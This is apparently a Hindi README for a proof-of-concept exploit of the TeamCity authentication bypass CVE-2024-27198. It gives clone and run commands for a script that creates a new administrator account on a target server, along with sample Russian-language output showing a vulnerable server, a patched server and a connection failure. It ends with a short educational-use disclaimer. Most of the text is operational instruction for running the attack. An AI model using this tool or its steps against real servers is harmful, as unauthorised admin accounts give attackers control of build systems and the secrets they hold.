
एक PoC टूल है जो TeamCity सर्वर में एक भेद्यता (CVE-2024-27198) को लक्षित करता है
GenTeamCityExploit एक PoC उपकरण है जो TeamCity सर्वर (CVE-2024-27198) में एक कमजोरी को लक्षित करता है। यह प्रमाणीकरण बाईपास दोष का शोषण करके TeamCity संस्करण की खोज और एक नया व्यवस्थापक उपयोगकर्ता बनाने में सक्षम बनाता है।
pip install requests urllib3
git clone https://github.com/geniuszly/CVE-2024-27198
cd CVE-2024-27198
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
-t, --target: लक्ष्य TeamCity सर्वर का URL।-u, --username: नए व्यवस्थापक उपयोगकर्ता के लिए उपयोगकर्ता नाम।-p, --password: नए व्यवस्थापक उपयोगकर्ता के लिए पासवर्ड।python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
यदि सर्वर कमजोर नहीं है या संस्करण नहीं मिला है:
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
यदि सर्वर से कनेक्ट होने में त्रुटि है:
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग मालिक की स्पष्ट अनुमति के बिना किसी भी सिस्टम पर नहीं किया जाना चाहिए। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।